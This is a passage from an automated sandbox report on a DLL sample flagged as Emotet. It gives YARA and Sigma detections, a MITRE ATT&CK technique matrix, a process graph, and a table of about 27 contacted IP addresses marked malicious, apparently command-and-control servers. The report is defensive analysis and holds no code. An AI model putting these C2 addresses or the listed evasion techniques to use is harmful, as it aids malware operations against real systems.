                      Source: Yara matchFile source: 0.0.loaddll32.exe.743608.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2c60000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.743608.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2810000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.743608.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2d13590.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.743608.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.743608.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.743608.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.743608.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.743608.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.3d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2810000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.33f3568.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2c60000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2fd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.3d0000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3310000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.743608.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.2b90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.34a3590.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2d13590.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.582902080.00000000003D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.583952569.000000000073C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.582956002.000000000073C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.584098715.000000000348A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.516939177.0000000002A69000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.583809959.00000000003D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.609571158.00000000003D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.584033877.0000000003310000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.608882072.000000000073C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.529764323.00000000033DA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.529712729.0000000002FD0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.689618667.0000000002E43000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.648560636.000000000073C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.608527561.00000000003D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.689328913.0000000002B90000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.610069085.000000000073C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.591122734.0000000002C60000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.533471939.0000000002810000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.591237102.0000000002CFA000.00000004.00000020.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation1DLL Side-Loading1Process Injection12Masquerading2OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerSecurity Software Discovery61SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSVirtualization/Sandbox Evasion3Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Files and Directories1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemSystem Information Discovery33Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)File Deletion1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 532100 Sample: mal2.exe Startdate: 01/12/2021 Architecture: WINDOWS Score: 84 50 210.57.217.132 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->50 52 203.114.109.124 TOT-LLI-AS-APTOTPublicCompanyLimitedTH Thailand 2->52 54 27 other IPs or domains 2->54 56 Sigma detected: Emotet RunDLL32 Process Creation 2->56 58 Found malware configuration 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 2 other signatures 2->62 9 loaddll32.exe 1 2->9         started        11 svchost.exe 2->11         started        14 svchost.exe 3 8 2->14         started        16 8 other processes 2->16 signatures3 process4 dnsIp5 19 rundll32.exe 2 9->19         started        22 cmd.exe 1 9->22         started        24 rundll32.exe 9->24         started        32 3 other processes 9->32 66 Changes security center settings (notifications, updates, antivirus, firewall) 11->66 26 MpCmdRun.exe 11->26         started        28 WerFault.exe 14->28         started        30 WerFault.exe 14->30         started        48 127.0.0.1 unknown unknown 16->48 signatures6 process7 signatures8 64 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->64 34 rundll32.exe 19->34         started        36 rundll32.exe 22->36         started        38 rundll32.exe 24->38         started        40 conhost.exe 26->40         started        42 rundll32.exe 32->42         started        process9 process10 44 rundll32.exe 34->44         started        46 rundll32.exe 36->46         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      mal2.dll24%ReversingLabsWin32.Trojan.Midie

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.0.loaddll32.exe.3d0000.6.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.2b90000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.3d0000.9.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.3d0000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.2.loaddll32.exe.3d0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      6.2.rundll32.exe.3310000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      3.2.rundll32.exe.2810000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.3d0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.2c60000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      4.2.rundll32.exe.2fd0000.0.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crl.microsoft0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://%s.xboxlive.com/0%Avira URL Cloudsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000A.00000003.420073505.000001F6D4452000.00000004.00000001.sdmpfalse
                        high
                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000003.371729055.000001F6D4434000.00000004.00000001.sdmpfalse
                          high
                          https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000A.00000002.450549356.000001F6D4429000.00000004.00000001.sdmpfalse
                            high
                            https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000A.00000003.420073505.000001F6D4452000.00000004.00000001.sdmpfalse
                              high
                              http://crl.microsoftWerFault.exe, 00000018.00000002.647603781.0000000003238000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000A.00000002.455572728.000001F6D4441000.00000004.00000001.sdmpfalse
                                high
                                https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000A.00000003.420113403.000001F6D4442000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.456157837.000001F6D4444000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.420122458.000001F6D4443000.00000004.00000001.sdmpfalse
                                  high
                                  https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000A.00000002.463794574.000001F6D446B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.420041356.000001F6D4469000.00000004.00000001.sdmpfalse
                                    high
                                    https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000A.00000002.454601455.000001F6D443D000.00000004.00000001.sdmpfalse
                                      high
                                      https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000A.00000002.450549356.000001F6D4429000.00000004.00000001.sdmpfalse
                                        high
                                        https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 0000000A.00000002.450549356.000001F6D4429000.00000004.00000001.sdmpfalse
                                          high
                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000003.371729055.000001F6D4434000.00000004.00000001.sdmpfalse
                                            high
                                            https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000A.00000003.420073505.000001F6D4452000.00000004.00000001.sdmpfalse
                                              high
                                              https://dev.virtualearth.net/REST/v1/Transit/Stops/svchost.exe, 0000000A.00000003.371729055.000001F6D4434000.00000004.00000001.sdmpfalse
                                                high
                                                http://crl.ver)svchost.exe, 00000005.00000002.627977305.0000017C92263000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                low
                                                https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000A.00000003.420098538.000001F6D4449000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.420113403.000001F6D4442000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.457191441.000001F6D444A000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://upx.sf.netAmcache.hve.20.drfalse
                                                    high
                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000002.450549356.000001F6D4429000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000A.00000002.450549356.000001F6D4429000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://%s.xboxlive.comsvchost.exe, 00000008.00000002.785008131.0000020F91447000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        low
                                                        https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000002.445658680.000001F6D4413000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000A.00000003.371729055.000001F6D4434000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000003.420113403.000001F6D4442000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.456157837.000001F6D4444000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.420122458.000001F6D4443000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.420073505.000001F6D4452000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.420073505.000001F6D4452000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000002.450549356.000001F6D4429000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.420087744.000001F6D444D000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=svchost.exe, 0000000A.00000003.371729055.000001F6D4434000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000A.00000003.371729055.000001F6D4434000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000003.420098538.000001F6D4449000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.457191441.000001F6D444A000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000003.420113403.000001F6D4442000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.456157837.000001F6D4444000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.420122458.000001F6D4443000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000A.00000002.458236717.000001F6D4450000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.420079711.000001F6D444F000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://dynamic.tsvchost.exe, 0000000A.00000003.420109133.000001F6D4447000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000A.00000003.420073505.000001F6D4452000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000A.00000003.371729055.000001F6D4434000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.454601455.000001F6D443D000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000003.420098538.000001F6D4449000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.457191441.000001F6D444A000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://ecn.dev.virtualearth.net/mapcontrol/roadshield.ashx?bucket=svchost.exe, 0000000A.00000003.371729055.000001F6D4434000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://activity.windows.comsvchost.exe, 00000008.00000002.785008131.0000020F91447000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.bingmapsportal.comsvchost.exe, 0000000A.00000002.445658680.000001F6D4413000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000A.00000003.420073505.000001F6D4452000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000002.450549356.000001F6D4429000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000002.450549356.000001F6D4429000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://%s.xboxlive.com/svchost.exe, 00000008.00000002.785008131.0000020F91447000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                low
                                                                                                https://%s.dnet.xboxlive.comsvchost.exe, 00000008.00000002.785008131.0000020F91447000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                low
                                                                                                https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000003.420113403.000001F6D4442000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.456157837.000001F6D4444000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.420122458.000001F6D4443000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000003.420087744.000001F6D444D000.00000004.00000001.sdmpfalse
                                                                                                    high

                                                                                                    Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    195.154.133.20
                                                                                                    unknownFrance
                                                                                                    12876OnlineSASFRtrue
                                                                                                    212.237.17.99
                                                                                                    unknownItaly
                                                                                                    31034ARUBA-ASNITtrue
                                                                                                    110.232.117.186
                                                                                                    unknownAustralia
                                                                                                    56038RACKCORP-APRackCorpAUtrue
                                                                                                    104.245.52.73
                                                                                                    unknownUnited States
                                                                                                    63251METRO-WIRELESSUStrue
                                                                                                    138.185.72.26
                                                                                                    unknownBrazil
                                                                                                    264343EmpasoftLtdaMeBRtrue
                                                                                                    81.0.236.90
                                                                                                    unknownCzech Republic
                                                                                                    15685CASABLANCA-ASInternetCollocationProviderCZtrue
                                                                                                    45.118.115.99
                                                                                                    unknownIndonesia
                                                                                                    131717IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaIDtrue
                                                                                                    103.75.201.2
                                                                                                    unknownThailand
                                                                                                    133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                                                                                                    216.158.226.206
                                                                                                    unknownUnited States
                                                                                                    19318IS-AS-1UStrue
                                                                                                    107.182.225.142
                                                                                                    unknownUnited States
                                                                                                    32780HOSTINGSERVICES-INCUStrue
                                                                                                    45.118.135.203
                                                                                                    unknownJapan63949LINODE-APLinodeLLCUStrue
                                                                                                    50.116.54.215
                                                                                                    unknownUnited States
                                                                                                    63949LINODE-APLinodeLLCUStrue
                                                                                                    51.68.175.8
                                                                                                    unknownFrance
                                                                                                    16276OVHFRtrue
                                                                                                    103.8.26.102
                                                                                                    unknownMalaysia
                                                                                                    132241SKSATECH1-MYSKSATECHNOLOGYSDNBHDMYtrue
                                                                                                    46.55.222.11
                                                                                                    unknownBulgaria
                                                                                                    34841BALCHIKNETBGtrue
                                                                                                    41.76.108.46
                                                                                                    unknownSouth Africa
                                                                                                    327979DIAMATRIXZAtrue
                                                                                                    103.8.26.103
                                                                                                    unknownMalaysia
                                                                                                    132241SKSATECH1-MYSKSATECHNOLOGYSDNBHDMYtrue
                                                                                                    178.79.147.66
                                                                                                    unknownUnited Kingdom
                                                                                                    63949LINODE-APLinodeLLCUStrue
                                                                                                    212.237.5.209
                                                                                                    unknownItaly
                                                                                                    31034ARUBA-ASNITtrue
                                                                                                    176.104.106.96
                                                                                                    unknownSerbia
                                                                                                    198371NINETRStrue
                                                                                                    207.38.84.195
                                                                                                    unknownUnited States
                                                                                                    30083AS-30083-GO-DADDY-COM-LLCUStrue
                                                                                                    212.237.56.116
                                                                                                    unknownItaly
                                                                                                    31034ARUBA-ASNITtrue
                                                                                                    45.142.114.231
                                                                                                    unknownGermany
                                                                                                    44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                                                                                                    203.114.109.124
                                                                                                    unknownThailand
                                                                                                    131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                                                                                                    210.57.217.132
                                                                                                    unknownIndonesia
                                                                                                    38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                                                                                                    58.227.42.236
                                                                                                    unknownKorea Republic of
                                                                                                    9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                                    185.184.25.237
                                                                                                    unknownTurkey
                                                                                                    209711MUVHOSTTRtrue
                                                                                                    158.69.222.101
                                                                                                    unknownCanada
                                                                                                    16276OVHFRtrue
                                                                                                    104.251.214.46
                                                                                                    unknownUnited States
                                                                                                    54540INCERO-HVVCUStrue

                                                                                                    Private

                                                                                                    IP
                                                                                                    127.0.0.1

                                                                                                    General Information

                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                    Analysis ID:532100
                                                                                                    Start date:01.12.2021
                                                                                                    Start time:18:09:23
                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                    Overall analysis duration:0h 14m 49s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Sample file name:mal2.exe (renamed file extension from exe to dll)
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                    Number of analysed new started processes analysed:38
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • HDC enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Detection:MAL
                                                                                                    Classification:mal84.troj.evad.winDLL@44/21@0/30
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    HDC Information:
                                                                                                    • Successful, ratio: 18.7% (good quality ratio 17.9%)
                                                                                                    • Quality average: 72.1%
                                                                                                    • Quality standard deviation: 24.4%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 79%
                                                                                                    • Number of executed functions: 44
                                                                                                    • Number of non-executed functions: 173
                                                                                                    Cookbook Comments:
                                                                                                    • Adjust boot time
                                                                                                    • Enable AMSI
                                                                                                    • Override analysis time to 240s for rundll32
                                                                                                    Warnings:
                                                                                                    Show All
                                                                                                    • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.35.236.56, 20.189.173.20, 51.11.168.232
                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, settingsfd-geo.trafficmanager.net, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532100/sample/mal2.dll

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    18:10:28API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                                    18:13:19API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                    18:13:28API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                    195.154.133.202gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                                                                                                      2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                                                                                                        9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                                                          FILE_464863409880121918.xlsmGet hashmaliciousBrowse
                                                                                                            9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                                                              t3XtgyQEoe.dllGet hashmaliciousBrowse
                                                                                                                t3XtgyQEoe.dllGet hashmaliciousBrowse
                                                                                                                  SCAN_35292280954166786.xlsmGet hashmaliciousBrowse
                                                                                                                    U4pi8WRxNJ.dllGet hashmaliciousBrowse
                                                                                                                      oERkAQeB4d.dllGet hashmaliciousBrowse
                                                                                                                        FC9fpZrma1.dllGet hashmaliciousBrowse
                                                                                                                          Z4HpRSQD6I.dllGet hashmaliciousBrowse
                                                                                                                            uLCt7sc5se.dllGet hashmaliciousBrowse
                                                                                                                              rGF1Xgw9Il.dllGet hashmaliciousBrowse
                                                                                                                                nBtjFS1D08.dllGet hashmaliciousBrowse
                                                                                                                                  q8HPR8Yypk.dllGet hashmaliciousBrowse
                                                                                                                                    mZuFa05xCp.dllGet hashmaliciousBrowse
                                                                                                                                      TEm3oBxeXS.dllGet hashmaliciousBrowse
                                                                                                                                        ma9Kq24IDH.dllGet hashmaliciousBrowse
                                                                                                                                          U8GZ7uVALA.dllGet hashmaliciousBrowse
                                                                                                                                            212.237.17.992gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                                                                                                                                              2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                                                                                                                                                9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                                                                                                  FILE_464863409880121918.xlsmGet hashmaliciousBrowse
                                                                                                                                                    9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                                                                                                      t3XtgyQEoe.dllGet hashmaliciousBrowse
                                                                                                                                                        t3XtgyQEoe.dllGet hashmaliciousBrowse
                                                                                                                                                          SCAN_35292280954166786.xlsmGet hashmaliciousBrowse
                                                                                                                                                            U4pi8WRxNJ.dllGet hashmaliciousBrowse
                                                                                                                                                              oERkAQeB4d.dllGet hashmaliciousBrowse
                                                                                                                                                                FC9fpZrma1.dllGet hashmaliciousBrowse
                                                                                                                                                                  Z4HpRSQD6I.dllGet hashmaliciousBrowse
                                                                                                                                                                    uLCt7sc5se.dllGet hashmaliciousBrowse
                                                                                                                                                                      rGF1Xgw9Il.dllGet hashmaliciousBrowse
